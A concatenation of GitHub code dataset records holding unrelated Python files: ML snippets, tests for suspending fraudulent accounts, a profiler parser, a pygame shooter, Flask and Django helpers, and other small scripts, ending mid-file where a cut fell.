sns\nsns.displot(reg_pred-y_test,kind='kde') # we are doing the differnce btw predicted and actual \n#as the grap is mostly between -10 to 10 with some variance to the left therefore the output is really good\n\n\nfrom sklearn.metrics import r2_score\nscore=r2_score(reg_pred,y_test)\nscore #0.6693702691495595\n","repo_name":"JubinThomas97/MACHINE_LEANING","sub_path":"MACHINE LEARNING/100_day_ML/Kish Nayak/Linear Regression Practical Implementation.py","file_name":"Linear Regression Practical Implementation.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25931194533","text":"import pytest\n\nfrom pcapi.core.bookings.factories import BookingFactory\nfrom pcapi.core.bookings.models import Booking\nfrom pcapi.core.bookings.models import BookingCancellationReasons\nfrom pcapi.core.bookings.models import BookingStatus\nimport pcapi.core.offerers.factories as offerers_factories\nfrom pcapi.core.offerers.models import Offerer\nfrom pcapi.core.offerers.models import Venue\nfrom pcapi.core.offers.factories import OfferFactory\nfrom pcapi.core.offers.factories import StockFactory\nfrom pcapi.core.offers.models import Offer\nfrom pcapi.core.offers.models import Stock\nfrom pcapi.core.users.factories import AdminFactory\nfrom pcapi.core.users.factories import BeneficiaryGrant18Factory\nfrom pcapi.core.users.factories import ProFactory\nfrom pcapi.scripts.suspend_fraudulent_pro_users import suspend_fraudulent_pro_by_email_providers\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_suspend_pros_in_given_emails_providers_list():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=offerer)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert not fraudulent_user.isActive\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_only_suspend_pro_users_in_given_emails_providers_list():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n pro_fraudulent_user_with_uppercase_domain = ProFactory(email=\"jesuisunefraude@EXAmple.com\")\n pro_fraudulent_user_with_subdomain = ProFactory(email=\"jesuisunefraude@sub.example.com\")\n beneficiary_fraudulent_user = BeneficiaryGrant18Factory(email=\"jesuisuneautrefraude@example.com\")\n offerer1 = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=pro_fraudulent_user_with_uppercase_domain, offerer=offerer1)\n offerer2 = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=pro_fraudulent_user_with_subdomain, offerer=offerer2)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert not pro_fraudulent_user_with_uppercase_domain.isActive\n\n # Do not handle sub-domains\n assert pro_fraudulent_user_with_subdomain.isActive\n assert beneficiary_fraudulent_user.isActive\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_dont_suspend_users_not_in_given_emails_providers_list():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n non_fraudulent_pro = ProFactory(email=\"jenesuispasunefraude@gmoil.com\")\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert non_fraudulent_pro.isActive\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_suspend_pro_user_with_many_offerers_and_delete_all_offerers():\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n first_offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=first_offerer)\n second_offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=second_offerer)\n\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n assert not fraudulent_user.isActive\n assert Offerer.query.count() == 0\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_delete_offerer_and_venue():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=offerer)\n offerers_factories.VenueFactory(managingOfferer=offerer)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert Offerer.query.count() == 0\n assert Venue.query.count() == 0\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_cancel_bookings_when_offerer_has_one_or_more():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n beneficiary1 = BeneficiaryGrant18Factory(email=\"beneficiary1@example.net\")\n beneficiary2 = BeneficiaryGrant18Factory(email=\"beneficiary2@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n offerer_with_bookings = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=offerer_with_bookings)\n offer1 = OfferFactory(venue__managingOfferer=offerer_with_bookings)\n offer2 = OfferFactory(venue__managingOfferer=offerer_with_bookings)\n stock1 = StockFactory(offer=offer1)\n stock2 = StockFactory(offer=offer2)\n booking1 = BookingFactory(user=beneficiary1, stock=stock1)\n booking2 = BookingFactory(user=beneficiary2, stock=stock2)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert Offerer.query.count() == 1\n assert Venue.query.count() == 2\n assert Offer.query.count() == 2\n assert Stock.query.count() == 2\n assert Booking.query.count() == 2\n assert booking1.status is BookingStatus.CANCELLED\n assert booking1.cancellationReason is BookingCancellationReasons.FRAUD\n assert booking2.status is BookingStatus.CANCELLED\n assert booking2.cancellationReason is BookingCancellationReasons.FRAUD\n","repo_name":"pass-culture/pass-culture-main","sub_path":"api/tests/scripts/suspend_suspected_fraudulent_pro_users_test.py","file_name":"suspend_suspected_fraudulent_pro_users_test.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"29"} +{"seq_id":"22591737077","text":"__author__ = 'jim'\n\nimport os\nimport sys\nimport argparse\n\nrow_names = [\n 'IA Bottleneck',\n 'IA SOL',\n 'Primitive Setup Bottleneck',\n 'Primitive Setup SOL',\n 'ROP Bottleneck',\n 'ROP SOL',\n 'Rasterization Bottleneck',\n 'Rasterization SOL',\n 'SHD Bottleneck',\n 'SHD SOL',\n 'TEX Bottleneck',\n 'TEX SOL',\n 'FB Bottleneck',\n 'FB SOL',\n 'L2 Bottleneck',\n 'tex_cache_hitrate',\n 'l2_read_bytes_mem',\n 'l2_read_bytes_tex',\n 'shd_tex_read_bytes',\n 'shd_tex_requests',\n 'inst_executed_ps',\n 'inst_executed_ps_ratio',\n 'inst_executed_vs',\n 'inst_executed_vs_ratio',\n 'setup_primitive_count',\n 'shaded_pixel_count'\n]\n\n\ndef value(line):\n line_split = str(line).split(' ')\n try:\n value_col_idx = line_split.index('value:')\n except:\n print(\"'value:' was not found in line.\")\n return\n\n if len(line_split) < value_col_idx + 1:\n return -1.0\n\n val_str = line_split[value_col_idx + 1]\n rval = -1.0\n try:\n rval = float(val_str)\n except:\n print('value was not a float: {}'.format(val_str))\n\n return rval\n\n\ndef parse_file(path):\n counters = []\n with os.open(path, 'r') as f:\n for line in f.readlines():\n counter = [x for x in row_names if line.startswith(x)][0]\n v = value(line)\n if v > -1.0:\n counters.append((counter, v))\n\n return counters\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', help='Directory with files to parse', type=str)\n parser.add_argument('-o', help='Output directory', type=str)\n\n args = parser.parse_args(args=sys.argv[1:])\n return args\n\n\ndef main():\n args = parse_args()\n\n if not os.path.exists(args.f):\n print('Path {} does not exist'.format(args.f))\n\n files = os.listdir(args.f)\n\n files_counters = dict()\n for p in files:\n files_counters[p] = parse_file(p)\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jimpelton/subvol","sub_path":"profile_parser/parse_nvpm.py","file_name":"parse_nvpm.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8845718627","text":"# Stacks and queues are dynamic sets in which a prespecified element is removed or added, respectively.\n# In a stack, the most recently added element is removed first. This is called last-in, first-out (LIFO).\n# In a queue, the element removed is always the one that has been in the set for the longest time. This is called first-in, first-out (FIFO).\n\n# Stacks\nstack = [2, 4, 6]\nstack.append(5)\nprint(stack)\nstack.pop()\nprint(stack)\n\n# Queues\nfrom collections import deque\nqueue = deque([2, 4, 6])\nqueue.append(5)\nprint(queue)\nqueue.popleft()\nprint(queue)\nqueue.pop()\nprint(queue)","repo_name":"SohamK2111/DSA","sub_path":"Elementary Data Structures/Stacks_and_Queues.py","file_name":"Stacks_and_Queues.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74499504719","text":"# from machine import Pin\nimport time\nimport machine\n\ndef callbackup(p):\n '''time.sleep_ms(300)\n flag = p.value()\n while True:\n vol_val = adc.read()\n pwm.duty(vol_val)'''\n \n #flag = p.value()\n print(adc.read())\n time.sleep(0.1)\n print(adc.read())\n print(p.value())\n\n\ndef callback(p):\n print(\"hahahah i am callbackdown\")\n print(adc.read())\n time.sleep(0.1)\n print(adc.read())\n print(p.value())\n voltage = p.value()\n if voltage ==0:\n while True:\n vol_val = adc.read()\n pwm.duty(vol_val)\n else:\n pwm.duty(10)\n sleep(3)\n\nadc = machine.ADC(0)\npwm = machine.PWM(machine.Pin(15))\npwm.freq(60)\npwm.duty(1000)\ntime.sleep(2)\nbutton = machine.Pin(2,machine.Pin.IN)\n\n#button.irq(trigger=machine.Pin.IRQ_RISING, handler=callbackup)\nbutton.irq(trigger=machine.Pin.IRQ_FALLING | machine.Pin.IRQ_RISING, handler=callback)\n\npwm.duty(10)","repo_name":"ty528146/200okgroup","sub_path":"lab2main10.py","file_name":"lab2main10.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30499158762","text":"from yap5 import *\nfrom random import randint\nfrom pyglet import gl\n\nstart = Vector(0, 0)\n\n\ndef setup():\n gl.glEnable(gl.GL_BLEND)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n\n background(Color(\"white\"))\n size(300, 300)\n\n\ndef draw():\n line(\n start,\n Vector(randint(0, WIDTH), HEIGHT),\n Theme(\n stroke=Color(\n randint(0, 50),\n randint(0, 255),\n randint(0, 255),\n 100),\n stroke_weight=12\n )\n )\n start.x = (start.x + 1) % WIDTH\n\n\nrun()\n","repo_name":"fenjalien/yap5","sub_path":"examples/random_lines.py","file_name":"random_lines.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"8529339580","text":"from functools import partial\nfrom socketserver import StreamRequestHandler, TCPServer\n\nclass EchoHandler(StreamRequestHandler):\n def __init__(self, *args, ack, **kwargs):\n self.ack = ack\n super().__init__(*args, **kwargs)\n \n def handle(self):\n for line in self.rfile:\n self.wfile.write(b'GOT: ' + line)\n\nserv = TCPServer(('', 15000), partial(EchoHandler, ack=b'RECEIVE:'))\nserv.serve_forever()","repo_name":"ziliihe/python_cookbook_3rd","sub_path":"pythoncookbook/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4388993964","text":"import pygame as pg\nimport random\nimport math\nimport pickle\nimport os\n\n\npg.init()\n\nclock = pg.time.Clock()\nfps = 20\nmax_hp = 20\nhp = 20\nscore = 0\nif os.path.exists('./highscore.dat'):\n highscore = pickle.load(open(\"highscore.dat\", \"rb\"))\nelse:\n highscore = 0\nlevel = 1\nenemies_in_level = 20\nenemy_counter = 20\nenemies_alive = 0\nx_distance = 0\ny_distance = 0\n\nscreen_width = 1400\nscreen_height = 800\n\nscreen = pg.display.set_mode((screen_width, screen_height))\npg.display.set_caption(\"Defense\")\n\nbullet_img = pg.image.load(\"laserYellowVertical.png\").convert_alpha()\nbullet_img = pg.transform.scale(bullet_img, (10, 10))\nbullet2_img = pg.image.load(\"laserRedVertical.png\").convert_alpha()\nbullet2_img = pg.transform.scale(bullet2_img, (10, 10))\nbg = pg.image.load(\"bg_castle.png\").convert_alpha()\nbg = pg.transform.scale(bg, (screen_width, screen_height))\nmouse = pg.transform.scale(pg.image.load(\"crosshair.png\"), (30, 30))\nscore_font = pg.font.Font(\"Turok.ttf\", 30)\nbig_font = pg.font.Font(\"Turok.ttf\", 80)\n\npg.mouse.set_cursor((8,8),(0,0),(0,0,0,0,0,0,0,0),(0,0,0,0,0,0,0,0))\nscreen.blit(bg, (0, 0))\n\nbullet_group = pg.sprite.Group()\nenemy_group = pg.sprite.Group()\n\n\nclass Player:\n def __init__(self, x, y):\n image = pg.image.load(\"player1.png\").convert_alpha()\n self.image = pg.transform.scale(image, (50, 50))\n self.image = pg.transform.scale(image, (50, 50))\n self.image.set_colorkey((255, 255, 255))\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.fired = False\n\n def update(self, x, y):\n pos = pg.mouse.get_pos()\n x_pos = pos[0] - x\n y_pos = -(pos[1] - y)\n angle = math.degrees(math.atan2(y_pos, x_pos))\n self.img = pg.transform.rotate(self.image, angle-90)\n self.img.set_colorkey((255, 255, 255))\n self.rect = self.img.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n\n screen.blit(self.img, self.rect)\n\n def shoot(self):\n pos = pg.mouse.get_pos()\n x_pos = pos[0] - self.rect.centerx\n y_pos = -(pos[1] - self.rect.centery)\n self.angle = math.degrees(math.atan2(y_pos, x_pos))\n\n if pg.mouse.get_pressed()[0] and self.fired == False:\n self.fired = True\n bullet = Bullet(pg.transform.rotate(bullet_img, self.angle-90), self.rect.centerx, self.rect.centery, self.angle, 1)\n bullet_group.add(bullet)\n\n if pg.mouse.get_pressed()[0] == False:\n self.fired = False\n\n\nclass Bullet(pg.sprite.Sprite):\n def __init__(self, image, x, y, angle, shooter):\n pg.sprite.Sprite.__init__(self)\n self.shooter = shooter\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.angle = math.radians(angle)\n self.speed = 20\n self.dx = math.cos(self.angle) * self.speed\n self.dy = -(math.sin(self.angle) * self.speed)\n self.time = 200\n\n def update(self):\n self.time -= 1\n if self.time == 0:\n self.kill()\n if self.rect.right < 0 or self.rect.left >= screen_width:\n self.dx *= -1\n self.image = pg.transform.rotate(self.image, self.angle-90)\n if self.rect.bottom < 0 or self.rect.top >= screen_height:\n self.dy *= -1\n self.image = pg.transform.rotate(self.image, self.angle-90)\n\n self.rect.x += self.dx\n self.rect.y += self.dy\n\n def draw(self):\n screen.blit(self.image, self.rect)\n\n\nclass Enemy(pg.sprite.Sprite):\n def __init__(self, x, y, number, speed, stop_dist):\n super().__init__()\n self.number = number\n image = pg.image.load(f\"enemy-shooter{self.number}.png\").convert_alpha()\n self.image = pg.transform.scale(image, (50, 50))\n self.image = pg.transform.scale(image, (50, 50))\n self.image.set_colorkey((255, 255, 255))\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.cooldown = 50\n self.speed = speed\n self.stop_dist = stop_dist\n self.move_lenght = 0\n self.x_move = 0\n self.y_move = 0\n\n def update(self, x, y):\n x_pos = player.rect.centerx - x\n y_pos = -(player.rect.centery - y)\n angle = math.degrees(math.atan2(y_pos, x_pos))\n self.img = pg.transform.rotate(self.image, angle-90)\n self.img.set_colorkey((255, 255, 255))\n self.rect = self.img.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.angle = math.radians(angle)\n self.dx = math.cos(self.angle) * self.speed\n self.dy = -(math.sin(self.angle) * self.speed)\n dist = math.sqrt((player.rect.centerx - self.rect.centerx) ** 2 + (player.rect.centery - self.rect.centery) ** 2)\n if dist > self.stop_dist:\n self.rect.centerx += self.dx\n self.rect.centery += self.dy\n if dist > self.stop_dist*2:\n self.rect.centerx += self.dx\n self.rect.centery += self.dy\n\n screen.blit(self.img, self.rect)\n\n def shoot(self):\n x_pos = player.rect.centerx - self.rect.centerx\n y_pos = -(player.rect.centery - self.rect.centery)\n self.angle = math.degrees(math.atan2(y_pos, x_pos))\n if self.cooldown > 0:\n self.cooldown -= 1\n if self.cooldown == 0:\n self.cooldown = 50\n bullet = Bullet(pg.transform.rotate(bullet2_img, self.angle-90), self.rect.centerx, self.rect.centery, self.angle, 0)\n bullet_group.add(bullet)\n\n def random_move(self):\n random_move = random.randint(0, 200)\n if random_move == 10:\n self.x_move = random.randint(-8, 8)\n self.y_move = random.randint(-8, 8)\n self.move_lenght = random.randint(5, 15)\n if self.move_lenght != 0:\n self.rect.centerx += self.x_move\n self.rect.centery += self.y_move\n self.move_lenght -= 1\n\n\ndef health_bar(hp, max_hp):\n color1 = round(255/max_hp*hp)\n color2 = 255-color1\n if color1 < 0:\n color1 = 0\n if color2 < 0:\n color2 = 0\n if color1 > 255:\n color1 = 255\n if color2 > 255:\n color2 = 255\n pg.draw.rect(screen, (0, 0, 0), pg.Rect(27, 27, 10*max_hp+6, 36))\n pg.draw.rect(screen, (color2, color1, 0), pg.Rect(30, 30, 10*hp, 30))\n\n\ndef background(x_distance, y_distance):\n bg_rect = pg.Rect(0+x_distance, 0+y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(-1400 + x_distance, 0 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(1400 + x_distance, 0 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(0 + x_distance, 800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(0 + x_distance, -800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(1400 + x_distance, 800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(-1400 + x_distance, 800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(1400 + x_distance, -800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(-1400 + x_distance, -800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n\n\ndef draw_text(text, font, text_col, x, y):\n img = font.render(text, True, text_col)\n screen.blit(img, (x, y))\n\n\ndef next_level(enemies_in_level):\n enemies_in_level += 5\n return enemies_in_level\n\n\ndef cursor(cursor):\n pos = pg.mouse.get_pos()\n screen.blit(cursor, (pos[0]-15, pos[1]-15))\n\n\ndef restart(run):\n game_lost = True\n draw_text(\"YOU LOST!\", big_font, (200, 200, 30), 530, 250)\n draw_text(\"press r to restart\", big_font, (200, 200, 30), 400, 400)\n pg.display.update()\n while game_lost:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n game_lost = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_r:\n game_lost = False\n return run\n\n\ndef pause(run):\n game_paused = True\n draw_text(\"GAME PAUSED\", big_font, (200, 200, 30), 480, 300)\n pg.display.update()\n while game_paused:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n game_paused = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_p:\n game_paused = False\n return run\n\n\nplayer = Player(675, 375)\n\n\nrun = True\nwhile run:\n clock.tick(fps)\n screen.fill((155, 155, 155))\n\n if score > highscore:\n highscore = score\n if enemy_counter > 0:\n for i in range(20):\n n = random.randint(1, 1000)\n t = random.randint(0, 1)\n if n == 25:\n enemy = Enemy(i * 50, 1400 * t, random.randint(1, 4), random.randint(2, 6), random.randint(130, 270))\n enemy_group.add(enemy)\n enemies_alive += 1\n enemy_counter -= 1\n for i in range(20):\n n = random.randint(1, 1000)\n t = random.randint(0, 1)\n if n == 25:\n enemy = Enemy(1400 * t, i * 50, random.randint(1, 4), random.randint(2, 6), random.randint(130, 270))\n enemy_group.add(enemy)\n enemies_alive += 1\n enemy_counter -= 1\n\n key = pg.key.get_pressed()\n if key[pg.K_UP]:\n if y_distance*-1 < -800:\n if player.rect.centery > 25:\n player.rect.centery -= 10\n else:\n if player.rect.centery > 375:\n player.rect.centery -= 10\n else:\n y_distance += 10\n for enemy in enemy_group:\n enemy.rect.centery += 10\n for bullet in bullet_group:\n bullet.rect.y += 10\n if key[pg.K_DOWN]:\n if y_distance*-1 > 800:\n if player.rect.centery < 775:\n player.rect.centery += 10\n else:\n if player.rect.centery < 375:\n player.rect.centery += 10\n else:\n y_distance -= 10\n for enemy in enemy_group:\n enemy.rect.centery -= 10\n for bullet in bullet_group:\n bullet.rect.y -= 10\n if key[pg.K_LEFT]:\n if x_distance * -1 < -1400:\n if player.rect.centerx > 25:\n player.rect.centerx -= 10\n else:\n if player.rect.centerx > 675:\n player.rect.centerx -= 10\n else:\n x_distance += 10\n for enemy in enemy_group:\n enemy.rect.centerx += 10\n for bullet in bullet_group:\n bullet.rect.x += 10\n if key[pg.K_RIGHT]:\n if x_distance*-1 > 1400:\n if player.rect.centerx < 1375:\n player.rect.centerx += 10\n else:\n if player.rect.centerx < 675:\n player.rect.centerx += 10\n else:\n x_distance -= 10\n for enemy in enemy_group:\n enemy.rect.centerx -= 10\n for bullet in bullet_group:\n bullet.rect.x -= 10\n\n background(x_distance, y_distance)\n player.shoot()\n\n for enemy in enemy_group:\n enemy.shoot()\n enemy.random_move()\n\n bullet_group.update()\n bullet_group.draw(screen)\n player.update(player.rect.centerx, player.rect.centery)\n\n for enemy in enemy_group:\n enemy.update(enemy.rect.centerx, enemy.rect.centery)\n for bullet in bullet_group:\n if pg.sprite.collide_rect(enemy, bullet):\n if bullet.shooter == 1:\n enemy.kill()\n bullet.kill()\n score += 1\n enemies_alive -= 1\n\n for bullet in bullet_group:\n if pg.sprite.collide_rect(player, bullet):\n if bullet.shooter == 0:\n hp -= 1\n bullet.kill()\n\n if hp <= 0:\n run = restart(run)\n x_distance = 0\n y_distance = 0\n background(x_distance, y_distance)\n if score == highscore:\n pickle.dump(highscore, open(\"highscore.dat\", \"wb\"))\n level = 1\n score = 0\n enemy_counter = 20\n enemies_in_level = 20\n enemies_alive = 0\n enemy_group.empty()\n bullet_group.empty()\n player = Player(675, 375)\n hp = max_hp\n\n health_bar(hp, max_hp)\n draw_text(f\"enemies alive: {enemies_alive}\", score_font, (200, 200, 30), 1100, 30)\n draw_text(f\"level: {level}\", score_font, (200, 200, 30), 1100, 70)\n draw_text(f\"score: {score}\", score_font, (200, 200, 30), 800, 30)\n draw_text(f\"highscore: {highscore}\", score_font, (200, 200, 30), 800, 70)\n\n if enemy_counter == 0 and enemies_alive == 0:\n enemy_counter = next_level(enemies_in_level)\n enemies_in_level = enemy_counter\n level += 1\n bullet_group.empty()\n x_distance, y_distance = 0, 0\n background(x_distance, y_distance)\n player = Player(675, 375)\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_p:\n run = pause(run)\n cursor(mouse)\n pg.display.update()\n\npg.quit()","repo_name":"erikhomza/shooter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35408344130","text":"# -*- coding: utf-8 -*-\n\nimport flask, json\n\nfrom application import app\nfrom application.mod_api.views_entries import api_get_entries\nfrom application.mod_api.models_entry import Entry, EntryDAO\nfrom application.mod_web.presentable_object import PresentableEntry\nfrom application.utils.pagination_services import Pagination\n\nfrom application.mod_web.utils_display_on_web import UtilsDisplayOnWeb\nfrom application.mod_web.views_user_settings import generate_token\n\n\n@app.route('/', methods=['GET'], defaults={'page': 1})\n@app.route('/strona/', methods=['GET'])\ndef main(page):\n if flask.request.cookies.get('op_token', None) is None:\n return generate_token(redirect_to=flask.url_for('main'))\n\n return _load_page_with_entries(title=u'Najnowsze', page=page)\n\n\n@app.route('/najlepsze', methods=['GET'], defaults={'page': 1})\n@app.route('/najlepsze/strona/', methods=['GET'])\ndef main_top(page):\n return _load_page_with_entries(title=u'Top plusowane',\n order_by=\"votes_up desc\",\n page=page)\n\n\ndef _load_page_with_entries(title=None, page=None, order_by=None):\n user_token = flask.request.cookies.get('op_token')\n items_per_page = app.config['ITEMS_PER_PAGE']\n response, status = api_get_entries(order_by=order_by,\n per_page=items_per_page,\n user_op_token=user_token,\n page=page)\n response_json = json.loads(response.data)\n\n p_entries = list()\n for entry_json in response_json[\"entries\"]:\n entry = Entry.from_json(entry_json)\n p_entries.append(PresentableEntry(entry))\n\n if not p_entries and page != 1:\n flask.abort(404)\n\n disp_web = UtilsDisplayOnWeb(user_token=user_token)\n entries_count = EntryDAO.get_entries_count()\n\n pagination = Pagination(page, items_per_page, entries_count)\n return flask.render_template('web/main.html', title=title,\n p_entries=p_entries,\n p_recommended_hashtags=disp_web.get_recommended_hashtags(),\n p_popular_hashtags=disp_web.get_popular_hashtags(),\n user_notifications_count=disp_web.get_user_notifications_count(),\n user_settings=disp_web.get_user_settings(),\n pagination=pagination)\n","repo_name":"tomkowz/anonymous-discussions","sub_path":"application/mod_web/views_main.py","file_name":"views_main.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1158548758","text":"import datetime\n\nfrom rest_framework import serializers\nfrom django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist\nfrom test.models import Budget,GlavBudget\n\ndef get_func(field):\n ''' возвращаем переписанный метод to_internal_value\n для foreign_key полей, на случай, когда\n дочерний элемент ссылается на несуществующий родительский'''\n def fk_to_internal_value(data=None):\n self = field\n if self.pk_field is not None:\n data = self.pk_field.to_internal_value(data)\n queryset = self.get_queryset()\n try:\n if isinstance(data, bool):\n raise TypeError\n return queryset.get(pk=data)\n except ObjectDoesNotExist:\n # та самая строчка, создадим объект,\n # если попадется с таким же пк, обновим его правильно\n return queryset.create(pk=data)\n except (TypeError, ValueError):\n self.fail('incorrect_type', data_type=type(data).__name__)\n return fk_to_internal_value\n\n\ndef get_ser(model):\n ''' возвращаем сериализатор для нашей модели\n так как модель заранее неизвестна, то и сериализатор неизвестен\n подкидываем на вход модельку и делаем под нее сер'''\n class ParseModelSerizer (serializers.ModelSerializer):\n class Meta:\n fields='__all__'\n\n def get_fields(self):\n ''' переопределим метод для fk полей,\n если они ссылаются на несуществующий инстанс'''\n fields=super().get_fields()\n for field in fields.values():\n if isinstance(field,serializers.PrimaryKeyRelatedField):\n field.to_internal_value=get_func(field)\n return fields\n ParseModelSerizer.Meta.model=model\n return ParseModelSerizer","repo_name":"ChepelDrepel/test_hh_nii","sub_path":"test/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"364280361","text":"import sys\r\nsys.stdin = open('input.txt', 'rt')\r\n\r\nn = int(input())\r\nnc = list(map(int, input().split()))\r\n# print(nc)\r\n\r\n\r\ndef digits_sum(x):\r\n sum = 0\r\n while (x > 0):\r\n sum += x % 10\r\n x /= 10\r\n return sum\r\n\r\n\r\nfor x in nc:\r\n digits_sum(x)\r\n\r\nprint(x)","repo_name":"j0n9hyun/python-ps","sub_path":"1-5.py","file_name":"1-5.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24814287705","text":"\"\"\"CLI errors.\"\"\"\nfrom typing import Any\n\n\ndef format_validation_error(e: dict[str, Any]) -> str:\n \"\"\"Format the error message of a pydantic validation error.\"\"\"\n error_type = e[\"type\"]\n loc = \".\".join(str(loc) for loc in e[\"loc\"])\n if error_type == \"value_error.missing\":\n return f\"{loc} is a required property\"\n elif error_type == \"value_error.extra\":\n return f\"Additional properties are not allowed ({loc} was unexpected)\"\n elif error_type == \"type_error.enum\":\n permitted = [str(enum.value) for enum in e[\"ctx\"][\"enum_values\"]]\n return (\n f\"{loc} has an invalid value; permitted values are: {', '.join(permitted)}\"\n )\n elif error_type == \"value_error.list.min_items\":\n min_items = e[\"ctx\"][\"limit_value\"]\n return f\"{loc}: at least {min_items} item is required\"\n else:\n msg = e.get(\"msg\", \"unknown error\")\n return f\"{loc}: {msg}\"\n","repo_name":"boostsecurityio/scanner-registry-action","sub_path":"boostsec/registry_validator/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21005113117","text":"import environment.task_generator as task_generator\nfrom .shapes import *\nfrom buildings import *\n\nfrom helper.placement_rules import *\nfrom helper.file_handler import *\nfrom settings import *\n\nimport random\nimport json\n\n# create a nice output when displaying the entire grid\nnp.set_printoptions(\n edgeitems=30, linewidth=100000, formatter=dict(float=lambda x: \"%.3g\" % 